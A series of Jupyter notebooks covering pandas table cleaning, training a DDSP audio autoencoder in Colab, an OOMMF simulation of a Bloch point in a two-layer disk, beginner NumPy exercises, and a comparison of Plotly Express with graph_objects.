<class 'pandas.core.frame.DataFrame'>
RangeIndex: 37 entries, 0 to 36
Data columns (total 14 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 Unnamed: 0 37 non-null int64
1 Unnamed: 0.1 1 non-null object
2 Compound 37 non-null object
3 log P 37 non-null object
4 Unnamed: 1 0 non-null float64
5 II 37 non-null float64
6 Hy 37 non-null float64
7 H, 37 non-null float64
8 MV 37 non-null object
9 R, 37 non-null float64
10 log Kou 37 non-null object
11 log Kyex 31 non-null object
12 Unnamed: 2 0 non-null float64
13 log Kpep 25 non-null object
dtypes: float64(6), int64(1), object(7)
memory usage: 4.2+ KB
###Markdown
We can switch to dropping columns which have `NaN` values by adding the argument `axis=1`.
###Code
table1.dropna(axis=1).info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 37 entries, 0 to 36
Data columns (total 9 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 Unnamed: 0 37 non-null int64
1 Compound 37 non-null object
2 log P 37 non-null object
3 II 37 non-null float64
4 Hy 37 non-null float64
5 H, 37 non-null float64
6 MV 37 non-null object
7 R, 37 non-null float64
8 log Kou 37 non-null object
dtypes: float64(4), int64(1), object(4)
memory usage: 2.7+ KB
###Markdown
This is closer to what we want. However, you'll notice that this has dropped some columns which have data. By default, pandas will drop a column which contains **any** `NaN` values. This may not be what we want in many cases because some values may simply be missing rather than incorrect.We can add an additional argument, `how=all`, to drop only columns whose values are **all** `NaN`. By default, this function argument is `how=any`. Once we are sure we would like to keep this as our dataframe, we can add `inplace=True` to the function call to overwrite the dataframe.
###Code
table1.dropna(axis=1, how="all")
###Output
_____no_output_____
###Markdown
The output above looks like something to keep, so we will add `inplace=True` to overwrite the original dataframe.
###Code
table1.dropna(axis=1, how="all", inplace=True)
table1.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 37 entries, 0 to 36
Data columns (total 12 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 Unnamed: 0 37 non-null int64
1 Unnamed: 0.1 1 non-null object
2 Compound 37 non-null object
3 log P 37 non-null object
4 II 37 non-null float64
5 Hy 37 non-null float64
6 H, 37 non-null float64
7 MV 37 non-null object
8 R, 37 non-null float64
9 log Kou 37 non-null object
10 log Kyex 31 non-null object
11 log Kpep 25 non-null object
dtypes: float64(4), int64(1), object(7)
memory usage: 3.6+ KB
###Markdown
We can drop the final two columns using the `drop` function. You can use this when you have specific rows or columns you would like to discard. Again, we use `axis=1` to drop columns, then we pass the column name.
###Code
table1.drop(axis=1, columns=["Unnamed: 0.1", "Unnamed: 0"], inplace=True)
###Output
_____no_output_____
###Markdown
Changing column namesOur column names are still incorrect. You will likely want to change them to make the table more legible.
###Code
table1.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 37 entries, 0 to 36
Data columns (total 10 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 Compound 37 non-null object
1 log P 37 non-null object
2 II 37 non-null float64
3 Hy 37 non-null float64
4 H, 37 non-null float64
5 MV 37 non-null object
6 R, 37 non-null float64
7 log Kou 37 non-null object
8 log Kyex 31 non-null object
9 log Kpep 25 non-null object
dtypes: float64(4), object(6)
memory usage: 3.0+ KB
###Markdown
We might now want to clean up the column names and make sure they are descriptive. You can see the column names using `table1.columns`. You can either rename the columns by setting `table1.columns` to a list of the appropriate length, or you can use `table1.rename`. In the `.rename` method, you put the argument `columns` and set it equal to a dictionary (curly brackets) where you use the syntax```python"current_column_name": "new_column_name"```
###Code
table1.columns
table1.rename(inplace=True, columns={
"II": "pi",
"Hy": "Hd",
"H,": "Ha",
"R,": "R_2",
"log Kou": "log K_oct",
"log Kyex": "log K_hex",
"log Kpep": "log K_hep"
})
table1.head()
###Output
_____no_output_____
###Markdown
Fixing Data Types When examining `.info`, you'll notice that a lot of our columns which should be numbers are still 'objects' or strings. We would like `log P`, for example, to be numeric. Typically, if a column appears to be numeric but pandas does not automatically cast it as such, it is because there are some non-numeric characters in the column which pandas could not decide what to do with. We will need to examine these, decide what to do with them, then cast the column as numeric. There are a few ways to do this, but we'll use the pandas function `to_numeric`.
###Code
table1.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 37 entries, 0 to 36
Data columns (total 10 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 Compound 37 non-null object
1 log P 37 non-null object
2 pi 37 non-null float64
3 Hd 37 non-null float64
4 Ha 37 non-null float64
5 MV 37 non-null object
6 R_2 37 non-null float64
7 log K_oct 37 non-null object
8 log K_hex 31 non-null object
9 log K_hep 25 non-null object
dtypes: float64(4), object(6)
memory usage: 3.0+ KB
###Markdown
Using the `to_numeric` function without any additional inputs will fail on this data set.
###Code
pd.to_numeric(table1["log P"])
###Output
_____no_output_____
###Markdown
Scrolling to the bottom of this message and reading the error, you will see it is having a problem reading the value `"— 6.85"`. It may not seem obvious what this problem is at first. When we run into a problem like this, we have a few options. You could choose to handle the errors differently. Pandas will let you set what you would like for it to do when it is unable to cast a value. By default, it will fail (which is what we see above). For example, you could also set errors to be ignored (which would result in the column being unchanged; there would just be no error raised) or to "coerce" the values. Choosing "coerce" means that anything that can't be cast as numeric will be set to `NaN`. Let's see what happens when we set errors to coerce.
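As a minimal sketch of the three error-handling options on a hypothetical toy Series (not the real column):
```python
import pandas as pd

s = pd.Series(["1.5", "— 6.85", "3.0"])  # the middle value cannot be parsed

# pd.to_numeric(s)                       # errors="raise" is the default and stops with a ValueError
pd.to_numeric(s, errors="ignore")        # returns the Series unchanged (still strings)
pd.to_numeric(s, errors="coerce")        # unparseable values become NaN: 1.5, NaN, 3.0
```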
###Code
pd.to_numeric(table1["log P"], errors="coerce")
###Output
_____no_output_____
###Markdown
This unfortunately results in no numeric characters being recognized.We have to do a little bit more processing to the values for this to work. If you examine the columns, you may notice that the negative sign is a little off. It is `—` when it should be `-`. This is very slight, and might be hard to see, but it is important to change for this data set.We will want to replace all `—` with `-`. We could accomplish this using the string method `replace`. Strings in Python have a number of methods. The `replace` method allows us to replace a substring within a string.
###Code
test_string = "Hello world."
test_string.replace(".", "!")
###Output
_____no_output_____
###Markdown
The split command is another string method you are probably familiar with:
###Code
test_string.split()
###Output
_____no_output_____
###Markdown
Pandas string methods If we want to use these on a column in a pandas dataframe, you might think to use `apply`, which we learned about in the last session. However, you will notice that the `replace` method acts on the string itself and doesn't fit neatly into `apply`. Luckily, when pandas columns are strings, we can use string methods on the whole column by adding `.str.<method>`. For example, to replace the minus signs:
###Code
table1["log P"].str.replace("—", "-")
table1["log P"] = table1["log P"].str.replace("—", "-")
# We still need to get rid of spaces
table1["log P"] = table1["log P"].str.replace(" ", "")
table1["log P"] = pd.to_numeric(table1["log P"], errors="coerce")
table1.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 37 entries, 0 to 36
Data columns (total 10 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 Compound 37 non-null object
1 log P 34 non-null float64
2 pi 37 non-null float64
3 Hd 37 non-null float64
4 Ha 37 non-null float64
5 MV 37 non-null object
6 R_2 37 non-null float64
7 log K_oct 37 non-null object
8 log K_hex 31 non-null object
9 log K_hep 25 non-null object
dtypes: float64(5), object(5)
memory usage: 3.0+ KB
###Markdown
We actually need to change this character in all of our columns. However, `str` methods only work on pandas Series. If we want to replace a substring across the entire DataFrame, we will use the `.replace` method. In order for it to recognize substrings, set the option `regex=True`. We will discuss `regex` more in the next session, but this is all you need to know about regex for the moment.
###Code
table1.replace("—", "-", regex=True, inplace=True)
table1.replace(" ", "", regex=True, inplace=True)
###Output
_____no_output_____
###Markdown
Changing the data type of multiple columns To change the data type of multiple columns, we will want to use the `pd.to_numeric` function on all of those columns. There are several ways you might choose to do this. For example, you might just choose to call the function for each column.We can also accomplish this by using the `apply` operator which we learned about in the last session. The `apply` operator should be used whenever you want to apply a function to a row or column. In this case, we want to apply the `pd.to_numeric` function to each column.Because we want to apply to the columns, we add the argument `axis=1`.
###Code
table1.apply(pd.to_numeric, axis=1)
###Output
_____no_output_____
###Markdown
When we try this code, we immediately see an error. We do not want to try to convert the first column to a number. We can use the `iloc` function to exclude the first column:
###Code
table1.iloc[:, 1:].apply(pd.to_numeric, axis=1)
###Output
_____no_output_____
###Markdown
An error again! This time, we see failure because a string was incorrectly read from the pdf and could not be converted to a number. You could choose to handle this differently, but for this workshop we are just going to discard values like these. If we were using `to_numeric` on a pandas series, we would use the option `errors="coerce"`. You may not see immediately how to use this with the `apply` function, but fortunately, pandas allows us to pass additional arguments with `apply`:
###Code
table1.iloc[:, 1:] = table1.iloc[:, 1:].apply(pd.to_numeric, axis=1, errors="coerce")
table1.info()
table1.to_csv("data/potts_table1_clean.csv", index=False)
###Output
_____no_output_____ |
ddsp/colab/demos/.ipynb_checkpoints/train_autoencoder-checkpoint.ipynb | ###Markdown
Copyright 2020 Google LLC.Licensed under the Apache License, Version 2.0 (the "License");
###Code
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
###Output
_____no_output_____
###Markdown
Train a DDSP Autoencoder on GPUThis notebook demonstrates how to install the DDSP library and train it for synthesis based on your own data using our command-line scripts. If run inside of Colab, it will automatically use a free Google Cloud GPU.At the end, you'll have a custom-trained checkpoint that you can download to use with the [DDSP Timbre Transfer Colab](https://colab.research.google.com/github/magenta/ddsp/blob/master/ddsp/colab/demos/timbre_transfer.ipynb). **Note that we prefix bash commands with a `!` inside of Colab, but you would leave them out if running directly in a terminal.** Install DependenciesFirst we install the required dependencies with `pip`.
###Code
%tensorflow_version 2.x
!pip install -qU ddsp[data_preparation]
# Initialize global path for using google drive.
DRIVE_DIR = ''
###Output
_____no_output_____
###Markdown
Setup Google Drive (Optional, Recommended)This notebook requires uploading audio and saving checkpoints. While you can do this with direct uploads / downloads, it is recommended to connect to your Google Drive account. This will enable faster file transfer, and regular saving of checkpoints so that you do not lose your work if the colab kernel restarts (common for training more than 12 hours). Login and mount your driveThis will require an authentication code. You should then be able to see your drive in the file browser on the left panel.
###Code
from google.colab import drive
drive.mount('/content/drive')
###Output
_____no_output_____
###Markdown
Set your base directory* In drive, put all of the audio (.wav, .mp3) files with which you would like to train in a single folder. * Typically works well with 10-20 minutes of audio from a single monophonic source (also, one acoustic environment). * Use the file browser in the left panel to find a folder with your audio, right-click **"Copy Path", paste below**, and run the cell.
###Code
#@markdown (ex. `/content/drive/My Drive/...`) Leave blank to skip loading from Drive.
DRIVE_DIR = '' #@param {type: "string"}
import os
assert os.path.exists(DRIVE_DIR)
print('Drive Folder Exists:', DRIVE_DIR)
###Output
_____no_output_____
###Markdown
Make directories to save model and data
###Code
AUDIO_DIR = 'data/audio'
AUDIO_FILEPATTERN = AUDIO_DIR + '/*'
!mkdir -p $AUDIO_DIR
if DRIVE_DIR:
SAVE_DIR = os.path.join(DRIVE_DIR, 'ddsp-solo-instrument')
else:
SAVE_DIR = '/content/models/ddsp-solo-instrument'
!mkdir -p "$SAVE_DIR"
###Output
_____no_output_____
###Markdown
Prepare Dataset Upload training audioUpload audio files to use for training your model. Uses `DRIVE_DIR` if connected to drive, otherwise prompts local upload.
###Code
import glob
import os
from ddsp.colab import colab_utils
if DRIVE_DIR:
mp3_files = glob.glob(os.path.join(DRIVE_DIR, '*.mp3'))
wav_files = glob.glob(os.path.join(DRIVE_DIR, '*.wav'))
audio_files = mp3_files + wav_files
else:
audio_files, _ = colab_utils.upload()
for fname in audio_files:
target_name = os.path.join(AUDIO_DIR,
os.path.basename(fname).replace(' ', '_'))
print('Copying {} to {}'.format(fname, target_name))
!cp "$fname" $target_name
###Output
_____no_output_____
###Markdown
Preprocess raw audio into TFRecord datasetWe need to do some preprocessing on the raw audio you uploaded to get it into the correct format for training. This involves turning the full audio into short (4-second) examples, inferring the fundamental frequency (or "pitch") with [CREPE](http://github.com/marl/crepe), and computing the loudness. These features will then be stored in a sharded [TFRecord](https://www.tensorflow.org/tutorials/load_data/tfrecord) file for easier loading. Depending on the amount of input audio, this process usually takes a few minutes.* (Optional) Transfer dataset from drive. If you've already created a dataset, from a previous run, this cell will skip the dataset creation step and copy the dataset from `$DRIVE_DIR/data`
###Code
import glob
import os
TRAIN_TFRECORD = 'data/train.tfrecord'
TRAIN_TFRECORD_FILEPATTERN = TRAIN_TFRECORD + '*'
# Copy dataset from drive if dataset has already been created.
drive_data_dir = os.path.join(DRIVE_DIR, 'data')
drive_dataset_files = glob.glob(drive_data_dir + '/*')
if DRIVE_DIR and len(drive_dataset_files) > 0:
!cp "$drive_data_dir"/* data/
else:
# Make a new dataset.
if not glob.glob(AUDIO_FILEPATTERN):
raise ValueError('No audio files found. Please use the previous cell to '
'upload.')
!ddsp_prepare_tfrecord \
--input_audio_filepatterns=$AUDIO_FILEPATTERN \
--output_tfrecord_path=$TRAIN_TFRECORD \
--num_shards=10 \
--alsologtostderr
# Copy dataset to drive for safe-keeping.
if DRIVE_DIR:
!mkdir "$drive_data_dir"/
print('Saving to {}'.format(drive_data_dir))
!cp $TRAIN_TFRECORD_FILEPATTERN "$drive_data_dir"/
###Output
_____no_output_____
###Markdown
Save dataset statistics for timbre transferQuantile normalization helps match loudness of timbre transfer inputs to the loudness of the dataset, so let's calculate it here and save in a pickle file.
###Code
from ddsp.colab import colab_utils
import ddsp.training
data_provider = ddsp.training.data.TFRecordProvider(TRAIN_TFRECORD_FILEPATTERN)
dataset = data_provider.get_dataset(shuffle=False)
PICKLE_FILE_PATH = os.path.join(SAVE_DIR, 'dataset_statistics.pkl')
colab_utils.save_dataset_statistics(data_provider, PICKLE_FILE_PATH)
###Output
_____no_output_____
###Markdown
Let's load the dataset in the `ddsp` library and have a look at one of the examples.
###Code
from ddsp.colab import colab_utils
import ddsp.training
from matplotlib import pyplot as plt
import numpy as np
data_provider = ddsp.training.data.TFRecordProvider(TRAIN_TFRECORD_FILEPATTERN)
dataset = data_provider.get_dataset(shuffle=False)
try:
ex = next(iter(dataset))
except StopIteration:
raise ValueError(
'TFRecord contains no examples. Please try re-running the pipeline with '
'different audio file(s).')
colab_utils.specplot(ex['audio'])
colab_utils.play(ex['audio'])
f, ax = plt.subplots(3, 1, figsize=(14, 4))
x = np.linspace(0, 4.0, 1000)
ax[0].set_ylabel('loudness_db')
ax[0].plot(x, ex['loudness_db'])
ax[1].set_ylabel('F0_Hz')
ax[1].set_xlabel('seconds')
ax[1].plot(x, ex['f0_hz'])
ax[2].set_ylabel('F0_confidence')
ax[2].set_xlabel('seconds')
ax[2].plot(x, ex['f0_confidence'])
###Output
_____no_output_____
###Markdown
Train ModelWe will now train a "solo instrument" model. This means the model is conditioned only on the fundamental frequency (f0) and loudness with no instrument ID or latent timbre feature. If you uploaded audio of multiple instruments, the neural network you train will attempt to model all timbres, but will likely associate certain timbres with different f0 and loudness conditions. First, let's start up a [TensorBoard](https://www.tensorflow.org/tensorboard) to monitor our loss as training proceeds. Initially, TensorBoard will report `No dashboards are active for the current data set.`, but once training begins, the dashboards should appear.
###Code
%reload_ext tensorboard
import tensorboard as tb
tb.notebook.start('--logdir "{}"'.format(SAVE_DIR))
###Output
_____no_output_____
###Markdown
We will now begin training. Note that we specify [gin configuration](https://github.com/google/gin-config) files for both the model architecture ([solo_instrument.gin](TODO)) and the dataset ([tfrecord.gin](TODO)), which are both predefined in the library. You could also create your own. We then override some of the specific params for `batch_size` (which is defined in the model gin file) and the tfrecord path (which is defined in the dataset file). Training Notes:* Models typically perform well when the loss drops to the range of ~4.5-5.0.* Depending on the dataset, this usually takes anywhere from 5k-30k training steps.* The default is set to 30k, but you can stop training at any time, and for timbre transfer, it's best to stop before the loss drops too far below ~5.0 to avoid overfitting.* On the colab GPU, this can take from around 3-20 hours. * We **highly recommend** saving checkpoints directly to your drive account as colab will restart naturally after about 12 hours and you may lose all of your checkpoints.* By default, checkpoints will be saved every 300 steps with a maximum of 10 checkpoints (at ~60MB/checkpoint this is ~600MB). Feel free to adjust these numbers depending on the frequency of saves you would like and space on your drive.* If you're restarting a session and `DRIVE_DIR` points to a directory that was previously used for training, training should resume at the last checkpoint.
###Code
!ddsp_run \
--mode=train \
--alsologtostderr \
--save_dir="$SAVE_DIR" \
--gin_file=models/solo_instrument.gin \
--gin_file=datasets/tfrecord.gin \
--gin_param="TFRecordProvider.file_pattern='$TRAIN_TFRECORD_FILEPATTERN'" \
--gin_param="batch_size=16" \
--gin_param="train_util.train.num_steps=30000" \
--gin_param="train_util.train.steps_per_save=300" \
--gin_param="trainers.Trainer.checkpoints_to_keep=10"
###Output
_____no_output_____
###Markdown
ResynthesisCheck how well the model reconstructs the training data
###Code
from ddsp.colab.colab_utils import play, specplot
import ddsp.training
import gin
from matplotlib import pyplot as plt
import numpy as np
data_provider = ddsp.training.data.TFRecordProvider(TRAIN_TFRECORD_FILEPATTERN)
dataset = data_provider.get_batch(batch_size=1, shuffle=False)
try:
batch = next(iter(dataset))
except StopIteration:
raise ValueError(
'TFRecord contains no examples. Please try re-running the pipeline with '
'different audio file(s).')
# Parse the gin config.
gin_file = os.path.join(SAVE_DIR, 'operative_config-0.gin')
gin.parse_config_file(gin_file)
# Load model
model = ddsp.training.models.Autoencoder()
model.restore(SAVE_DIR)
# Resynthesize audio.
audio_gen = model(batch, training=False)
audio = batch['audio']
print('Original Audio')
specplot(audio)
play(audio)
print('Resynthesis')
specplot(audio_gen)
play(audio_gen)
###Output
_____no_output_____
###Markdown
Download CheckpointBelow you can download the final checkpoint. You are now ready to use it in the [DDSP Timbre Transfer Colab](https://colab.research.google.com/github/magenta/ddsp/blob/master/ddsp/colab/demos/timbre_transfer.ipynb).
###Code
from ddsp.colab import colab_utils
import tensorflow as tf
import os
CHECKPOINT_ZIP = 'my_solo_instrument.zip'
latest_checkpoint_fname = os.path.basename(tf.train.latest_checkpoint(SAVE_DIR))
!cd "$SAVE_DIR" && zip $CHECKPOINT_ZIP $latest_checkpoint_fname* operative_config-0.gin dataset_statistics.pkl
!cp "$SAVE_DIR/$CHECKPOINT_ZIP" ./
colab_utils.download(CHECKPOINT_ZIP)
###Output
_____no_output_____ |
examples/spatially-varying-parameters2.ipynb | ###Markdown
Spatially varying parameters 2In this notebook, one data point from Figure 2 in [Beg *et al.* Stable and manipulable Bloch point. *Scientific Reports*, **9**, 7959 (2019)](https://doi.org/10.1038/s41598-019-44462-2) is simulated. We need to relax a $150 \,\text{nm}$ disk, which consists of two layers with different sign of the Dzyaloshinskii-Moriya constant $D$. The bottom layer with $D>0$ has $20 \,\text{nm}$ thickness, while the top layer with $D<0$ has $10 \,\text{nm}$ thickness. We start by importing the necessary modules and creating the mesh with two regions.
###Code
import oommfc as mc
import discretisedfield as df
import micromagneticmodel as mm
d = 150e-9
hb = 20e-9
ht = 10e-9
cell = (5e-9, 5e-9, 2.5e-9)
subregions = {'r1': df.Region(p1=(-d/2, -d/2, -hb), p2=(d/2, d/2, 0)),
'r2': df.Region(p1=(-d/2, -d/2, 0), p2=(d/2, d/2, ht))}
p1 = (-d/2, -d/2, -hb)
p2 = (d/2, d/2, ht)
mesh = df.Mesh(p1=p1, p2=p2, cell=cell, subregions=subregions)
###Output
_____no_output_____
###Markdown
The mesh domain and the discretisation cells are:
###Code
mesh.k3d()
###Output
_____no_output_____
###Markdown
and the two regions we defined are:
###Code
mesh.k3d_subregions()
###Output
_____no_output_____
###Markdown
Now, we need to define the system object, and by setting magnetisation saturation, set the geometry to be a disk.
###Code
system = mm.System(name='bloch_point')
D = {'r1': 1.58e-3, 'r2': -1.58e-3, 'r1:r2': 1.58e-9}
Ms = 3.84e5
A = 8.78e-12
def Ms_fun(point):
x, y, z = point
if x**2 + y**2 <= (d/2)**2:
return Ms
else:
return 0
system.energy = mm.Exchange(A=A) + mm.DMI(D=D, crystalclass='T') + mm.Demag()
system.m = df.Field(mesh, dim=3, value=(0, 0, 1), norm=Ms_fun)
###Output
_____no_output_____
###Markdown
Our sample is now:
###Code
system.m.norm.k3d.nonzero()
###Output
_____no_output_____
###Markdown
Now, we can minimise the system's energy by using `MinDriver`.
###Code
md = mc.MinDriver()
md.drive(system)
###Output
Running OOMMF (ExeOOMMFRunner)[2022/02/25 18:18]... (2.3 s)
###Markdown
The out-of-plane magnetisation component ($m_{z}$) is now:
###Code
system.m.z.k3d.scalar(filter_field=system.m.norm)
###Output
_____no_output_____
###Markdown
We can see that two vortices with different orientation emerged. We can inspect this more closely by plotting the magnetisation in the two different layers:
###Code
import k3d
plot = k3d.plot()
system.m.plane(z=-10e-9, n=(20, 20)).k3d.vector(plot=plot, color_field=system.m.z, head_size=30)
system.m.plane(z=5e-9, n=(20, 20)).k3d.vector(plot=plot,color_field=system.m.z, head_size=30)
plot.display()
###Output
_____no_output_____
###Markdown
We can now plot another cross section and see that the Bloch point emerged.
###Code
@df.interact(y=system.m.mesh.slider('y', continuous_update=False))
def my_plot(y):
system.m.plane(y=y).mpl(figsize=(10, 5), vector_kw={'scale': 1e7})
###Output
_____no_output_____ |
Abanoub.ipynb | ###Markdown
###Code
import numpy as np
print("Hello Mr.Abanoub")
!pip install numpy
x=np.my_array=([5, 9, 10, 18, 122, 14, 77])
print(x)
print(x[1:3])
print(x[2:7])
y=np.my_array=([[8, 8, 2, 11, 44, 99, 5],[8, 7, 1, 0, 22, 66, 8]])
print(y)
print(y[0:5])
print(y[0:3])
import numpy as np
Random=np.random.random((3,3))
print(Random)
print(Random[0:3])
import numpy as np
Zero= np.zeros([3,3])
print(Zero)
print("Yes")
import numpy as np
Pop=np.ones([4,4])
print(Pop)
import numpy as np
Abanoub = np. full((5,5),8)
print(Abanoub)
import numpy as np
ident=np.eye(2,2)
print(ident)
import numpy as np
x=np.array=([[5, 10, 10, 20, 25, 30],[25, 45, 60, 55, 80, 99]])
y=np.array=([[2, 3, 8, 9, 5, 7],[8, 4, 2, 1, 3, 6]])
print(x)
print(y)
print(np.add(x,y))
print(np.subtract(x,y))
print(np.divide(y,x))
print(np.multiply(x,y))
print(np.sqrt((x)))
print(x)
x_new=np.sqrt(x)
y_new=np.divide(x,y)
print(x_new)
print(y_new)
z=np.multiply(x_new,y_new)
print(z)
import numpy as np
#Define an array of np's
My_Array= np.array=([10, 5, 9, 7])
print(My_Array)
print(type(My_Array))
print(My_Array.count)
print(My_Array[0])
My_Array[2]=80
print(My_Array[2])
print(My_Array[3])
import numpy as np
arr=np.array=([[5,6],[2, 4]])
v=np.array=([[5, 2],[3, 5, 9]])
print(v)
###Output
[[5, 2], [3, 5, 9]]
|
DV - Data Visualizations with Plotly/02.Using Scenarios with Plotly/02.02.Plotly Express vs Graph_Objects.ipynb | ###Markdown
`Plotly Express` vs `Graph_Objects` (go)* `Plotly Express` is a new high-level framework released in 2019.* However, for some cases we might still want to use the old framework `Graph_Objects` (go). So we need to understand the differences between them.
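As a quick preview of the difference (a minimal sketch on made-up data; the real comparison with the iris data follows below): `plotly.express` builds a complete figure from a single function call, while `graph_objects` asks you to assemble the traces and layout yourself.
```python
import plotly.express as px
import plotly.graph_objects as go

x = [1, 2, 3]
y = [2, 4, 9]  # made-up values, just for illustration

# Plotly Express: one call gives a finished, labeled figure
fig_px = px.scatter(x=x, y=y, title="px version")

# graph_objects: build the trace and the layout explicitly
fig_go = go.Figure(data=go.Scatter(x=x, y=y, mode="markers"))
fig_go.update_layout(title="go version")
```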
###Code
import plotly.express as px
import plotly.graph_objects as go
iris = px.data.iris()
iris.head()
###Output
_____no_output_____
###Markdown
Graphing with `plotly.express`
###Code
iris.columns
fig = px.scatter(iris, 'sepal_width', 'sepal_length', title='Sepal Width vs Sepal Length')
fig.show()
print(fig)
###Output
Figure({
'data': [{'hovertemplate': 'sepal_width=%{x}<br>sepal_length=%{y}<extra></extra>',
'legendgroup': '',
'marker': {'color': '#636efa', 'symbol': 'circle'},
'mode': 'markers',
'name': '',
'orientation': 'v',
'showlegend': False,
'type': 'scatter',
'x': array([3.5, 3. , 3.2, 3.1, 3.6, 3.9, 3.4, 3.4, 2.9, 3.1, 3.7, 3.4, 3. , 3. ,
4. , 4.4, 3.9, 3.5, 3.8, 3.8, 3.4, 3.7, 3.6, 3.3, 3.4, 3. , 3.4, 3.5,
3.4, 3.2, 3.1, 3.4, 4.1, 4.2, 3.1, 3.2, 3.5, 3.1, 3. , 3.4, 3.5, 2.3,
3.2, 3.5, 3.8, 3. , 3.8, 3.2, 3.7, 3.3, 3.2, 3.2, 3.1, 2.3, 2.8, 2.8,
3.3, 2.4, 2.9, 2.7, 2. , 3. , 2.2, 2.9, 2.9, 3.1, 3. , 2.7, 2.2, 2.5,
3.2, 2.8, 2.5, 2.8, 2.9, 3. , 2.8, 3. , 2.9, 2.6, 2.4, 2.4, 2.7, 2.7,
3. , 3.4, 3.1, 2.3, 3. , 2.5, 2.6, 3. , 2.6, 2.3, 2.7, 3. , 2.9, 2.9,
2.5, 2.8, 3.3, 2.7, 3. , 2.9, 3. , 3. , 2.5, 2.9, 2.5, 3.6, 3.2, 2.7,
3. , 2.5, 2.8, 3.2, 3. , 3.8, 2.6, 2.2, 3.2, 2.8, 2.8, 2.7, 3.3, 3.2,
2.8, 3. , 2.8, 3. , 2.8, 3.8, 2.8, 2.8, 2.6, 3. , 3.4, 3.1, 3. , 3.1,
3.1, 3.1, 2.7, 3.2, 3.3, 3. , 2.5, 3. , 3.4, 3. ]),
'xaxis': 'x',
'y': array([5.1, 4.9, 4.7, 4.6, 5. , 5.4, 4.6, 5. , 4.4, 4.9, 5.4, 4.8, 4.8, 4.3,
5.8, 5.7, 5.4, 5.1, 5.7, 5.1, 5.4, 5.1, 4.6, 5.1, 4.8, 5. , 5. , 5.2,
5.2, 4.7, 4.8, 5.4, 5.2, 5.5, 4.9, 5. , 5.5, 4.9, 4.4, 5.1, 5. , 4.5,
4.4, 5. , 5.1, 4.8, 5.1, 4.6, 5.3, 5. , 7. , 6.4, 6.9, 5.5, 6.5, 5.7,
6.3, 4.9, 6.6, 5.2, 5. , 5.9, 6. , 6.1, 5.6, 6.7, 5.6, 5.8, 6.2, 5.6,
5.9, 6.1, 6.3, 6.1, 6.4, 6.6, 6.8, 6.7, 6. , 5.7, 5.5, 5.5, 5.8, 6. ,
5.4, 6. , 6.7, 6.3, 5.6, 5.5, 5.5, 6.1, 5.8, 5. , 5.6, 5.7, 5.7, 6.2,
5.1, 5.7, 6.3, 5.8, 7.1, 6.3, 6.5, 7.6, 4.9, 7.3, 6.7, 7.2, 6.5, 6.4,
6.8, 5.7, 5.8, 6.4, 6.5, 7.7, 7.7, 6. , 6.9, 5.6, 7.7, 6.3, 6.7, 7.2,
6.2, 6.1, 6.4, 7.2, 7.4, 7.9, 6.4, 6.3, 6.1, 7.7, 6.3, 6.4, 6. , 6.9,
6.7, 6.9, 5.8, 6.8, 6.7, 6.7, 6.3, 6.5, 6.2, 5.9]),
'yaxis': 'y'}],
'layout': {'legend': {'tracegroupgap': 0},
'template': '...',
'title': {'text': 'Sepal Width vs Sepal Length'},
'xaxis': {'anchor': 'y', 'domain': [0.0, 1.0], 'title': {'text': 'sepal_width'}},
'yaxis': {'anchor': 'x', 'domain': [0.0, 1.0], 'title': {'text': 'sepal_length'}}}
})
###Markdown
------- Graphing with `graph_objects`
###Code
fig = go.Figure(data=go.Scatter(x=iris['sepal_width'],
y=iris['sepal_length'],
mode='markers'))
fig.update_layout(
title='Sepal Width vs Sepal Length',
xaxis_title='sepal_width',
yaxis_title='sepal_length'
)
fig.show()
print(fig)
###Output
Figure({
'data': [{'mode': 'markers',
'type': 'scatter',
'x': array([3.5, 3. , 3.2, 3.1, 3.6, 3.9, 3.4, 3.4, 2.9, 3.1, 3.7, 3.4, 3. , 3. ,
4. , 4.4, 3.9, 3.5, 3.8, 3.8, 3.4, 3.7, 3.6, 3.3, 3.4, 3. , 3.4, 3.5,
3.4, 3.2, 3.1, 3.4, 4.1, 4.2, 3.1, 3.2, 3.5, 3.1, 3. , 3.4, 3.5, 2.3,
3.2, 3.5, 3.8, 3. , 3.8, 3.2, 3.7, 3.3, 3.2, 3.2, 3.1, 2.3, 2.8, 2.8,
3.3, 2.4, 2.9, 2.7, 2. , 3. , 2.2, 2.9, 2.9, 3.1, 3. , 2.7, 2.2, 2.5,
3.2, 2.8, 2.5, 2.8, 2.9, 3. , 2.8, 3. , 2.9, 2.6, 2.4, 2.4, 2.7, 2.7,
3. , 3.4, 3.1, 2.3, 3. , 2.5, 2.6, 3. , 2.6, 2.3, 2.7, 3. , 2.9, 2.9,
2.5, 2.8, 3.3, 2.7, 3. , 2.9, 3. , 3. , 2.5, 2.9, 2.5, 3.6, 3.2, 2.7,
3. , 2.5, 2.8, 3.2, 3. , 3.8, 2.6, 2.2, 3.2, 2.8, 2.8, 2.7, 3.3, 3.2,
2.8, 3. , 2.8, 3. , 2.8, 3.8, 2.8, 2.8, 2.6, 3. , 3.4, 3.1, 3. , 3.1,
3.1, 3.1, 2.7, 3.2, 3.3, 3. , 2.5, 3. , 3.4, 3. ]),
'y': array([5.1, 4.9, 4.7, 4.6, 5. , 5.4, 4.6, 5. , 4.4, 4.9, 5.4, 4.8, 4.8, 4.3,
5.8, 5.7, 5.4, 5.1, 5.7, 5.1, 5.4, 5.1, 4.6, 5.1, 4.8, 5. , 5. , 5.2,
5.2, 4.7, 4.8, 5.4, 5.2, 5.5, 4.9, 5. , 5.5, 4.9, 4.4, 5.1, 5. , 4.5,
